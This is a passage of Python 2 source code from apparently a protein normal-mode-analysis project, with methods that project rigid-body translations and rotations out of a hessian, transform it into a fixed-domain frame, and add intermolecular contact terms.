Rz = np.concatenate((counterPartNullVector, Rz))
# Normalize translation vectors and apply rotational fix
if normalize:
Tx = Vector(Tx)
#Tx = self.subtractCenterOfCoords(Tx, centerOfCoords[0], 0.0, 0.0)
Tx = Tx.getNormed().getArray()
Ty = Vector(Ty)
#Ty = self.subtractCenterOfCoords(Ty, 0.0, centerOfCoords[1], 0.0)
Ty = Ty.getNormed().getArray()
Tz = Vector(Tz)
#Tz = self.subtractCenterOfCoords(Tz, 0.0, 0.0, centerOfCoords[2])
Tz = Tz.getNormed().getArray()
Rx = Vector(Rx)
#Rx = self.subtractCenterOfCoords(Rx, 0.0, centerOfCoords[2], centerOfCoords[1])
Rx = Rx.getNormed().getArray()
Ry = Vector(Ry)
#Ry = self.subtractCenterOfCoords(Ry, centerOfCoords[2], 0.0, centerOfCoords[0])
Ry = Ry.getNormed().getArray()
Rz = Vector(Rz)
#Rz = self.subtractCenterOfCoords(Rz, centerOfCoords[1], centerOfCoords[0], 0.0)
Rz = Rz.getNormed().getArray()
# Create P
#P = I - np.outer(Rx, Rx) - np.outer(Ry, Ry) - np.outer(Rz, Rz) - np.outer(Tx, Tx) - np.outer(Ty, Ty) - np.outer(Tz, Tz)
### corres P = I - P
#print "independent columns P: ", self.utils.independent_columns(P).shape
#print "matrix rank P: ", self.utils.matrixrank(P)
#print "independent columns I-P: ", self.utils.independent_columns(I-P).shape
#print "matrix rank I-P: ", self.utils.matrixrank(I-P)
#print "np matrix rank I-P : ", np.linalg.matrix_rank(I-P)
#print "np matrix as matrix rank I-P : ", np.linalg.matrix_rank(np.matrix(I-P))
assumedBasis = np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T
MyQ, MyR = np.linalg.qr(assumedBasis)
#print "MyQ.shape: ", MyQ.shape
Rx = MyQ.T[0]
Ry = MyQ.T[1]
Rz = MyQ.T[2]
Tx = MyQ.T[3]
Ty = MyQ.T[4]
Tz = MyQ.T[5]
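# np.linalg.qr orthonormalizes the six rigid-body vectors; the columns of Q span the same
# subspace as [Tx, Ty, Tz, Rx, Ry, Rz], and only that span matters for the projector below
# (the column order no longer matches the R/T naming, which is harmless here).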
###
print "before full projection"
###
P = I - np.outer(Rx, Rx) - np.outer(Ry, Ry) - np.outer(Rz, Rz) - np.outer(Tx, Tx) - np.outer(Ty, Ty) - np.outer(Tz, Tz)
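# With an orthonormal set {v_k}, P = I - sum_k outer(v_k, v_k) is the symmetric, idempotent
# projector onto the complement of the rigid-body subspace (P == P.T and P.dot(P) == P), so
# P^T H' P removes the six external translation/rotation degrees of freedom from the hessian.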
#print "assumedBasis : \n", assumedBasis.round(4)
#print "basis after QR: \n", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4)
#writeArray("assumedBasis.txt", assumedBasis.round(4), format="%f")
#writeArray("basis_after_QR.txt", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4), format="%f")
###
#print "P", P
# print "P.shape", P.shape
# print "symmetric P: ", np.allclose(P, P.T)
# print "complex calphas * 3: ", proteinComplex.select('calpha').numAtoms() * 3
# print "rank of P projection", projectionStyle, ": ", np.linalg.matrix_rank(np.matrix(P))
# P_eigenvals, P_eigenvecs = np.linalg.eigh(P)
# print "number of P_eigenvals: ", len(P_eigenvals)
# #print "P_eigenvals: ", P_eigenvals
# print "number of P_eigenvecs: ", len(P_eigenvecs)
# #print "P_eigenvecs: ", P_eigenvecs
# #writeArray("helperScripts/"+proteinComplex.getTitle()+"_P_"+projectionStyle+".txt", P, format='%10.7f')
# #writeArray("P_eigenvals"+projectionStyle+".txt", P_eigenvals, format='%10.7f')
# #writeArray("P_eigenvecs"+projectionStyle+".txt", P_eigenvecs, format='%10.7f')
#
# P_times_Peigenvecs = P.dot(P_eigenvecs)
# P_times_Peigenvecs_T = P.dot(P_eigenvecs).T
# P_orthonormalityTest = P_times_Peigenvecs_T.dot(P_times_Peigenvecs)
# #writeArray("P_orthonormalityTest"+projectionStyle+".txt", P_orthonormalityTest, format='%10.7f')
# # does this P_orthonormalityTest equal the identity matrix or part of it?
# print "P_orthonormalityTest: ", np.allclose(P_orthonormalityTest, np.identity(len(P_eigenvecs)))
# print "P_orthonormalityTest w/o upper 6x6: ", np.allclose(P_orthonormalityTest[6:,6:], np.identity(len(P_eigenvecs)-6))
# zeroM = np.zeros((len(P_eigenvecs), len(P_eigenvecs)))
# zeroM[6:,6:] = P_orthonormalityTest[6:,6:]
# print "P_orthonormalityTest except lower n-6,n-6 zero: ", np.allclose(P_orthonormalityTest, zeroM)
# proteinComplex_ca = proteinComplex.select('calpha')
# writePDB("complex_allatoms.pdb", proteinComplex)
# writePDB("complex_before_Ptimes.pdb", proteinComplex_ca)
# coord_shape = proteinComplex_ca.getCoords().shape
# coords_P = P.dot(proteinComplex_ca.getCoords().flatten())
# coords_P = coords_P.reshape(coord_shape)
# proteinComplex_ca.setCoords(coords_P)
# writePDB("complex_after_Ptimes"+projectionStyle+".pdb", proteinComplex_ca)
#raw_input()
###
# Q, R = np.linalg.qr(P, mode="complete")
# print "independent columns Q: ", self.utils.independent_columns(Q).shape
# print "matrix rank Q: ", self.utils.matrixrank(Q)
# print "matrix np rank Q: ", np.linalg.matrix_rank(Q)," ", np.linalg.matrix_rank(np.matrix(Q))
# print "log of determinant of Q: ", np.linalg.slogdet(Q)
### corres Q = I - Q
#P = I-Q
# Apply P^T H' P, np.dot is matrix multiplication for 2D arrays
#print "count orthogonal columns: ", self.utils.countOrthogonalColumns(I-P)
Hprime = np.dot(P.T, hessian)
Hprime = np.dot(Hprime, P)
# Return the projected hessian
#print "after projection symmetry ==, allclose: ", np.all(Hprime-Hprime.T==0), np.allclose(Hprime, Hprime.T)
#print "H: ", hessian
#print "Hprime: ", Hprime
return Hprime
def projectHessian_test2timesQR(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle, projectOnlyReferencePartOfHC=False, interCalphaIndices=None):
""" Return the PH'P hessian which has 6 zero eigenvalues according to the formula 8.27
from the book "A practical introduction to the simulation of molecular dynamics", Field.
However, here it is made sure that the assumed basis is orthonormal via np.linalg.qr applied
on the six vectors discussed in this book.
Args:
hessian: the hessian to be projected
reference: the protein the hessian or HRtilde/HLtilde of the hessian was created on
proteinComplex: the whole protein that reference is part of
referenceSegment: if reference is receptor, provide "R", else it needs to be ligand, provide "L"
projectionStyle: project away from "full" (intra+inter) or "intra" (intra) or "fullComplex"
projectOnlyReferencePartOfHC: if true, the hessian was created on reference, if false, HRtilde or HLtilde
of the hessian were created on the reference
interCalphaIndices: list of calphas indices that have intermolecular interactions
Returns: projected hessian with 6 external degrees of freedom (rotation and translation) removed
"""
assert projectionStyle == "full"
normalize = True
numAtoms = reference.select('calpha').numAtoms()
numCoords = numAtoms*3
centerOfCoords = calcCenter(reference.select('calpha'))
assert np.alltrue(centerOfCoords == calcCenter(proteinComplex.select('segment \"'+referenceSegment+'.\"').select('calpha')))
print "before projection symmetry ==, allclose: ", np.all(hessian-hessian.T==0), np.allclose(hessian, hessian.T)
numComplexAtoms = proteinComplex.select('calpha').numAtoms()
numComplexCoords = numComplexAtoms*3
numCounterpartCoords = numComplexCoords - numCoords
if referenceSegment == "R":
assert numCounterpartCoords == proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3
else:
assert numCounterpartCoords == proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
# Create null vector with length of the counterpart calphas
counterPartNullVector = np.zeros(numCounterpartCoords)
# Create I
I = np.identity(numComplexCoords)
# Create the three translation vectors Tx, Ty, Tz
Tx = np.zeros(numComplexCoords)
Tx = self.utils.fill3DArrayWithValue(Tx, 1.0, 0)
Ty = np.zeros(numComplexCoords)
Ty = self.utils.fill3DArrayWithValue(Ty, 1.0, 1)
Tz = np.zeros(numComplexCoords)
Tz = self.utils.fill3DArrayWithValue(Tz, 1.0, 2)
# Create the three rotation vectors Rx, Ry, Rz
coordsCopy = proteinComplex.select('calpha').getCoords().copy()
Rx = self.utils.createRx(coordsCopy)
coordsCopy2 = proteinComplex.select('calpha').getCoords().copy()
Ry = self.utils.createRy(coordsCopy2)
coordsCopy3 = proteinComplex.select('calpha').getCoords().copy()
Rz = self.utils.createRz(coordsCopy3)
# if projectOnlyReferencePartOfHC:
# # overwrite previous I
# I = np.identity(numComplexCoords)
# # extend (with the nullvector) the rotational and translational vectors to the dimension of the complex
# if referenceSegment == "R":
# Tx = np.concatenate((Tx, counterPartNullVector))
# Ty = np.concatenate((Ty, counterPartNullVector))
# Tz = np.concatenate((Tz, counterPartNullVector))
# Rx = np.concatenate((Rx, counterPartNullVector))
# Ry = np.concatenate((Ry, counterPartNullVector))
# Rz = np.concatenate((Rz, counterPartNullVector))
# else:
# Tx = np.concatenate((counterPartNullVector, Tx))
# Ty = np.concatenate((counterPartNullVector, Ty))
# Tz = np.concatenate((counterPartNullVector, Tz))
# Rx = np.concatenate((counterPartNullVector, Rx))
# Ry = np.concatenate((counterPartNullVector, Ry))
# Rz = np.concatenate((counterPartNullVector, Rz))
# Normalize translation vectors and apply rotational fix
if normalize:
Tx = Vector(Tx)
#Tx = self.subtractCenterOfCoords(Tx, centerOfCoords[0], 0.0, 0.0)
Tx = Tx.getNormed().getArray()
Ty = Vector(Ty)
#Ty = self.subtractCenterOfCoords(Ty, 0.0, centerOfCoords[1], 0.0)
Ty = Ty.getNormed().getArray()
Tz = Vector(Tz)
#Tz = self.subtractCenterOfCoords(Tz, 0.0, 0.0, centerOfCoords[2])
Tz = Tz.getNormed().getArray()
Rx = Vector(Rx)
#Rx = self.subtractCenterOfCoords(Rx, 0.0, centerOfCoords[2], centerOfCoords[1])
Rx = Rx.getNormed().getArray()
Ry = Vector(Ry)
#Ry = self.subtractCenterOfCoords(Ry, centerOfCoords[2], 0.0, centerOfCoords[0])
Ry = Ry.getNormed().getArray()
Rz = Vector(Rz)
#Rz = self.subtractCenterOfCoords(Rz, centerOfCoords[1], centerOfCoords[0], 0.0)
Rz = Rz.getNormed().getArray()
assumedBasis = np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T
MyQ, MyR = np.linalg.qr(assumedBasis, mode='full')
Rx = MyQ.T[0]
Ry = MyQ.T[1]
Rz = MyQ.T[2]
Tx = MyQ.T[3]
Ty = MyQ.T[4]
Tz = MyQ.T[5]
Rx = Rx[:numCoords]
Ry = Ry[:numCoords]
Rz = Rz[:numCoords]
Tx = Tx[:numCoords]
Ty = Ty[:numCoords]
Tz = Tz[:numCoords]
assumedBasis = np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T
MyQ, MyR = np.linalg.qr(assumedBasis, mode='full')
Rx = MyQ.T[0]
Ry = MyQ.T[1]
Rz = MyQ.T[2]
Tx = MyQ.T[3]
Ty = MyQ.T[4]
Tz = MyQ.T[5]
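# Experimental double-QR variant: the six complex-wide rigid-body vectors are orthonormalized,
# truncated to the reference coordinates, orthonormalized again, and then zero-padded back to
# the complex dimension below before the projector is assembled.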
print "len(Rx): ", len(Rx)
Tx = np.concatenate((Tx, counterPartNullVector))
Ty = np.concatenate((Ty, counterPartNullVector))
Tz = np.concatenate((Tz, counterPartNullVector))
Rx = np.concatenate((Rx, counterPartNullVector))
Ry = np.concatenate((Ry, counterPartNullVector))
Rz = np.concatenate((Rz, counterPartNullVector))
print "Pr test"
raw_input()
P = I - np.outer(Rx, Rx) - np.outer(Ry, Ry) - np.outer(Rz, Rz) - np.outer(Tx, Tx) - np.outer(Ty, Ty) - np.outer(Tz, Tz)
#print "assumedBasis : \n", assumedBasis.round(4)
#print "basis after QR: \n", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4)
#writeArray("assumedBasis.txt", assumedBasis.round(4), format="%f")
#writeArray("basis_after_QR.txt", np.array([Tx, Ty, Tz, Rx, Ry, Rz]).T.round(4), format="%f")
###
print "P", P
print "P.shape", P.shape
print "symmetric P: ", np.allclose(P, P.T)
print "complex calphas * 3: ", proteinComplex.select('calpha').numAtoms() * 3
print "rank of P projection", projectionStyle, ": ", np.linalg.matrix_rank(np.matrix(P))
P_eigenvals, P_eigenvecs = np.linalg.eigh(P)
print "number of P_eigenvals: ", len(P_eigenvals)
#print "P_eigenvals: ", P_eigenvals
print "number of P_eigenvecs: ", len(P_eigenvecs)
#print "P_eigenvecs: ", P_eigenvecs
writeArray("helperScripts/"+proteinComplex.getTitle()+"_P_"+projectionStyle+".txt", P, format='%10.7f')
#writeArray("P_eigenvals"+projectionStyle+".txt", P_eigenvals, format='%10.7f')
#writeArray("P_eigenvecs"+projectionStyle+".txt", P_eigenvecs, format='%10.7f')
P_times_Peigenvecs = P.dot(P_eigenvecs)
P_times_Peigenvecs_T = P.dot(P_eigenvecs).T
P_orthonormalityTest = P_times_Peigenvecs_T.dot(P_times_Peigenvecs)
#writeArray("P_orthonormalityTest"+projectionStyle+".txt", P_orthonormalityTest, format='%10.7f')
# does this P_orthonormalityTest equal the identity matrix or part of it?
print "P_orthonormalityTest: ", np.allclose(P_orthonormalityTest, np.identity(len(P_eigenvecs)))
print "P_orthonormalityTest w/o upper 6x6: ", np.allclose(P_orthonormalityTest[6:,6:], np.identity(len(P_eigenvecs)-6))
zeroM = np.zeros((len(P_eigenvecs), len(P_eigenvecs)))
zeroM[6:,6:] = P_orthonormalityTest[6:,6:]
print "P_orthonormalityTest except lower n-6,n-6 zero: ", np.allclose(P_orthonormalityTest, zeroM)
# proteinComplex_ca = proteinComplex.select('calpha')
# writePDB("complex_allatoms.pdb", proteinComplex)
# writePDB("complex_before_Ptimes.pdb", proteinComplex_ca)
# coord_shape = proteinComplex_ca.getCoords().shape
# coords_P = P.dot(proteinComplex_ca.getCoords().flatten())
# coords_P = coords_P.reshape(coord_shape)
# proteinComplex_ca.setCoords(coords_P)
# writePDB("complex_after_Ptimes"+projectionStyle+".pdb", proteinComplex_ca)
raw_input()
###
# Q, R = np.linalg.qr(P, mode="complete")
# print "independent columns Q: ", self.utils.independent_columns(Q).shape
# print "matrix rank Q: ", self.utils.matrixrank(Q)
# print "matrix np rank Q: ", np.linalg.matrix_rank(Q)," ", np.linalg.matrix_rank(np.matrix(Q))
# print "log of determinant of Q: ", np.linalg.slogdet(Q)
### corres Q = I - Q
#P = I-Q
# Apply P^T H' P, np.dot is matrix multiplication for 2D arrays
#print "count orthogonal columns: ", self.utils.countOrthogonalColumns(I-P)
Hprime = np.dot(P.T, hessian)
Hprime = np.dot(Hprime, P)
# Return the projected hessian
#print "after projection symmetry ==, allclose: ", np.all(Hprime-Hprime.T==0), np.allclose(Hprime, Hprime.T)
#print "H: ", hessian
#print "Hprime: ", Hprime
return Hprime
def transformHessianToFixedDomainFrame(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle):
""" Application of formula 20 from:
Fuchigami, Sotaro, Satoshi Omori, Mitsunori Ikeguchi, and Akinori Kidera.
"Normal Mode Analysis of Protein Dynamics in a Non-Eckart Frame."
The Journal of Chemical Physics 132, no. 10 (March 11, 2010): 104109. doi:10.1063/1.3352566.
"""
numAtoms = reference.select('calpha').numAtoms()
numCoords = numAtoms*3
centerOfCoords = calcCenter(reference.select('calpha'))
#assert np.alltrue(centerOfCoords == calcCenter(proteinComplex.select('segment \"'+referenceSegment+'.\"').select('calpha')))
numComplexAtoms = proteinComplex.select('calpha').numAtoms()
numComplexCoords = numComplexAtoms*3
numCounterpartCoords = numComplexCoords - numCoords
if referenceSegment == "R":
# create the P matrix, receptor is fixed domain
P = np.zeros((numComplexCoords, numComplexCoords))
P[:numCoords, :numCoords] = np.identity(numCoords)
assert numCounterpartCoords == proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3
else:
# create the P matrix, ligand is fixed domain
P = np.zeros((numComplexCoords, numComplexCoords))
numCoords_receptor = proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
P[numCoords_receptor:, numCoords_receptor:] = np.identity(proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3)
assert numCounterpartCoords == proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
# create rigid body motion eigenvectors out_values
out_vals, out_vectors = sp.linalg.eigh(hessian)
# sort the eigenvalues and eigenvectors ascendingly, this is not asserted by the eigh return, see
# http://stackoverflow.com/questions/8092920/sort-eigenvalues-and-associated-eigenvectors-after-using-numpy-linalg-eig-in-pyt
idx = out_vals.argsort()
out_vals = out_vals[idx]
out_vectors = out_vectors[:,idx]
# take the first six eigenvalues and eigenvectors
out_vals = out_vals[:6]
out_vectors = out_vectors.T[:6].T
#print "P.shape: ", P.shape
#print "out_vectors.shape: ", out_vectors.shape
# create the transformation matrix
inv = (out_vectors.T.dot(P)).dot(out_vectors)
inv = np.linalg.inv(inv)
secondTerm = ((out_vectors.dot(inv)).dot(out_vectors.T)).dot(P)
U = np.identity(numComplexCoords) - secondTerm
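# Following Eq. 20 of Fuchigami et al.: with V the six lowest-frequency eigenvectors and P
# selecting the fixed-domain coordinates, U = I - V * (V^T P V)^(-1) * V^T * P, and the
# transformed hessian U H U^T is expressed in the frame in which that domain is held fixed.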
print "calculated transformation matrix U"
#writeArray("hessianbeforeU.txt", hessian, format='%10.7f')
Hprime = np.dot(U, hessian)
Hprime = np.dot(Hprime, U.T)
#writeArray(proteinComplex.getTitle()+"U.txt", U, format='%10.7f')
#writeArray("hessianafterU.txt", Hprime, format='%10.7f')
print "obtained Hprime with a fixed domain frame"
return Hprime
def subtractCenterOfCoords(self, vector, xElement, yElement, zElement):
""" Subtract from a vector having a [i][3] dim array elementwise the center of coords and return the result. """
coordsNx3 = vector.getArrayNx3()
subtractArray = np.array([xElement, yElement, zElement])
coordsNx3 = coordsNx3 - subtractArray
resultVector = Vector(coordsNx3.flatten())
return resultVector
def addscaledHdelta(self, HR, HRtilde, deltaHRmultiplicator):
assert HR.shape == HRtilde.shape
deltaHR = HRtilde - HR
deltaHR = deltaHR * deltaHRmultiplicator
return (HR + deltaHR)
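# Example for addscaledHdelta: with deltaHRmultiplicator = 0.5 the result is
#   HR + 0.5*(HRtilde - HR) == 0.5*HR + 0.5*HRtilde,
# the midpoint between the original and the modified hessian; 0 returns HR, 1 returns HRtilde.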
def calcCustomH_ANew(self, HR, referenceStructure, neighborStructure, encounter, neighborhoodFrom, equilibriumAt, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian HR or HL by adding additonal terms for intramolecular contacts.
Args:
HR: The original HR as calculated by prody
referenceStructure: structure to take calphas from, the hessian HR belongs to it or to its superset if I is a chain
neighborStructure: structure to apply the neighborhood calculations on
encounter: object with all encounter information
neighborhoodFrom: is the neighborhood calculated from the unbound complex C_u or the bound complex C_b
equilibriumAt: is the equilibrium set to r_ij or r_ij_b
workOnReceptor: whether the Hessian and the referenceStructure belong to the receptor (True) or the ligand (False)
selstr: atom type of the coarse-grained ANM (by default calpha)
"""
assert equilibriumAt == "r_ij" or equilibriumAt == "r_ij_b"
assert neighborhoodFrom == "C_u" or neighborhoodFrom == "C_b"
if workOnReceptor:
reference = encounter.getReference()
if self.bound_provided == True:
refchain = encounter.getRefChain()
mobile = encounter.getMobile()
mobChain = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpart()
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
else:
reference = encounter.getUnboundCounterpart()
if self.bound_provided == True:
refchain = encounter.getUnboundCounterpartChain()
mobile = encounter.getBoundCounterpart()
mobChain = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobile()
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
neighborStructureCalpha = neighborStructure.select('calpha')
contactsCounter = 0
interCalphaIndices = []
for idx, element in enumerate(referenceStructure.select('calpha')):
contactsOfI = encounter.getIntermolecularNeighborsOfAtom(element, neighborStructure, selstr, str(self.utils.config.customHRdistance))
# if element has contacts in the neighborStructure, the hessian needs an update in the 3*3 matrix on the diagonal of this element atom
if contactsOfI:
contactsCounter += contactsOfI.numAtoms()
interCalphaIndices.append(idx)
print "intermolecular contacts: ", contactsOfI.numAtoms()
contacts_counterpartChainIndices = self.utils.getMatchingStructureSelections(neighborStructureCalpha, contactsOfI, neighborStructureCalpha)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
if neighborhoodFrom == "C_u":
r_ij = calcDistance(element, elementcontact)
if equilibriumAt == "r_ij":
r_ij_b = r_ij
#if element is not in matched reference or contact is not in matched counterpart: r_ij_b = r_ij
elif not(element in refchain.select('calpha')) or not(elementcontact in unboundCounterpartChain.select('calpha')):
r_ij_b = r_ij
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, refchain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, unboundCounterpartChain.select('calpha'))
r_ij_b = calcDistance(mobChain.select('calpha')[elementPositionInChain], boundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(element, elementcontact, r_ij, r_ij_b)
#print element, elementcontact, " r_ij, rij_b: ", r_ij, r_ij_b
overallTerm += deltaTerm
else:
if equilibriumAt == "r_ij_b":
r_ij_b = calcDistance(element, elementcontact)
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
r_ij_b = r_ij
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], r_ij, r_ij_b)
#print refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], " r_ij, rij_b: ", r_ij, r_ij_b
overallTerm += deltaTerm
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# add the overallterm to the hessian matrix
if neighborhoodFrom == "C_b":
elementPosition = encounter.accessANMs().getCalphaPosition(refchain.select('calpha')[elementPositionInChain], reference.select('calpha'))
else:
elementPosition = encounter.accessANMs().getCalphaPosition(element, reference.select('calpha'))
HR = self.add3By3MatrixtoHessian(overallTerm, HR, elementPosition*3)
print "added custom terms to hessian"
print "total intermolecular contacts: ", contactsCounter
return HR, interCalphaIndices
def calcCustomH_ANew_IJ(self, referenceStructure, neighborStructure, encounter, areStructuresChains, equilibriumAt, workOnReceptor=True, selstr='calpha'):
""" Creates the HRL matrix made through intramolecular contacts.
Args:
referenceStructure: structure to take calphas from, the hessian HR belongs to it or to its superset if I is a chain
neighborStructure: structure to apply the neighborhood calculations on
encounter: object with all encounter information
areStructuresChains: boolean to describe if the structures are chains (subsets)
equilibriumAt: is the equilibrium set to r_ij or r_ij_b
workOnReceptor: whether the Hessian and the referenceStructure belong to the receptor (True) or the ligand (False)
selstr: atom type of the coarse-grained ANM (by default calpha)
"""
assert equilibriumAt == "r_ij" or equilibriumAt == "r_ij_b"
if workOnReceptor:
if areStructuresChains:
if self.bound_provided == True:
mobile = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpartChain()
else:
pass
else:
reference = encounter.getReference()
unboundCounterpart = encounter.getUnboundCounterpart()
if self.bound_provided == True:
refchain = encounter.getRefChain()
mobile = encounter.getMobile()
mobChain = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpart()
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
else:
if areStructuresChains:
if self.bound_provided == True:
mobile = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobChain()
else:
pass
else:
reference = encounter.getUnboundCounterpart()
unboundCounterpart = encounter.getReference()
if self.bound_provided == True:
refchain = encounter.getUnboundCounterpartChain()
mobile = encounter.getBoundCounterpart()
mobChain = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobile()
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
neighborStructureCalpha = neighborStructure.select('calpha')
offDiagonalHessianMatrix = np.zeros(((reference.select('calpha').numAtoms()*3), (unboundCounterpart.select('calpha').numAtoms()*3) ))
contactsCounter = 0
for idx, element in enumerate(referenceStructure.select('calpha')):
contactsOfI = encounter.getIntermolecularNeighborsOfAtom(element, neighborStructure, selstr, str(self.utils.config.customHRdistance))
# if element has contacts in the neighborStructure, the hessian needs an update in the 3*3 matrix on the diagonal of this element atom
if contactsOfI:
print "intermolecular contacts: ", contactsOfI.numAtoms()
contactsCounter += contactsOfI.numAtoms()
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructureSelections(neighborStructureCalpha, contactsOfI, neighborStructureCalpha)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
overallTerm = np.zeros((3,3))
#self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
#self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
r_ij = calcDistance(element, elementcontact)
if equilibriumAt == "r_ij":
r_ij_b = r_ij
#if element is not in matched reference or contact is not in matched counterpart: r_ij_b = r_ij
elif not(element in refchain.select('calpha')) or not(elementcontact in unboundCounterpartChain.select('calpha')):
r_ij_b = r_ij
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, refchain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, unboundCounterpartChain.select('calpha'))
r_ij_b = calcDistance(mobChain.select('calpha')[elementPositionInChain], boundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
#
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(element, elementcontact, r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# print overallTerm
offDiagonalHessianMatrix = self.add3By3MatrixtoOffDiagonalHessianMatrixIJ(overallTerm, offDiagonalHessianMatrix, idx*3, contacts_counterpartChainIndex*3)
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
#print ""
# add the overallterm to the hessian matrix
###elementPosition = encounter.accessANMs().getCalphaPosition(element, encounter.getReference().select('calpha'))
print "added custom terms to offDiagonalHessianMatrix"
print "total intermolecular contacts: ", contactsCounter
return offDiagonalHessianMatrix
def calcCustomH_ANew_U1(self, HR, referenceStructure, neighborStructure, encounter, areStructuresChains, equilibriumAt, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian HR or HL by adding additonal terms for intramolecular contacts.
Args:
HR: The original HR as calculated by prody
